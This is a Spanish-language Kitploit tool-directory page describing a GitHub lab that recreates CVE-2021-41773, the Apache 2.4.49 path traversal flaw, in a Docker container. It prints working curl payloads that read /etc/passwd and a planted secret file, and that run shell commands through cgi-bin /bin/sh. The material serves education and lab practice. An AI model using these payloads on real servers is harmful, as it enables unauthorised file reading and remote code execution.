Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-41773-exploration — Recreación y análisis de un curioso error lógico en Apache 2.4.49 que escaló a ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/klmntbelgium/cve-2021-41773-exploration
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubklmntbelgium/cve-2021-41773-exploration

cve-2021-41773-exploration

Recreación y análisis de un curioso error lógico en Apache 2.4.49 que escaló a ejecución remota de código.

Ver Repositorio
12hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Resumen

CVE-2021-41773 es una vulnerabilidad de path traversal descubierta en Apache HTTP Server 2.4.49 en octubre de 2021. La causa raíz fue una falla en la normalización adecuada de las secuencias de puntos terminadas en la URL antes de verificar si la ruta solicitada permanecía dentro de la raíz web. Esta vulnerabilidad permitía a un atacante salir de la raíz web para acceder a archivos en cualquier parte del sistema de archivos del servidor, con algunos casos de escalamiento hasta ejecución remota de código.

2 vectores de ataque demostrados en esta exploración

  • path traversal: leer archivos arbitrarios en el sistema de archivos
  • path traversal + ejecución remota de código: ejecutar comandos arbitrarios del SO

Requisitos previos:

Docker
curl
Linux o macOS

Contenido del repositorio:

Dockerfile - construir contenedor vulnerable de Apache 2.4.49
exploit.sh - script automatizado de cadena de explotación
README.md

Resumen del Dockerfile:

  • acceso al directorio raíz (permite la travesía)
  • habilitar mod_cgi (escala travesía simple a RCE)
  • archivo de prueba colocado en /etc/secret_credential.txt para demostrar acceso no autorizado a datos

Ejecutando el exploit:

Nota: asegúrate de que docker esté instalado y ejecutándose

Opción 1: script automático
chmod +x exploit.sh
./exploit.sh

Opción 2: ejecución manual
Construir imagen y ejecutar contenedor:
sudo docker build -t cve-2021-41773-env .


sudo docker run -d -p 8080:80 --name vulnerable-apache cve-2021-41773-env

Comandos curl individuales para experimentación manual:
Stage 1 — Leer secreto colocado (travesía pura, sin CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/secret_credential.txt"

Stage 2 — Leer /etc/passwd (travesía pura, sin CGI)
curl -s --path-as-is \ "http://localhost:8080/static/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

Stage 3 — RCE: ejecutar comandos (requiere mod_cgi)
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; id; whoami; uname -a" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

Stage 4 — Cadena completa: leer secreto mediante RCE
curl -s --path-as-is \ -d "echo Content-Type: text/plain; echo; cat /etc/secret_credential.txt" \ "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

Descargar herramienta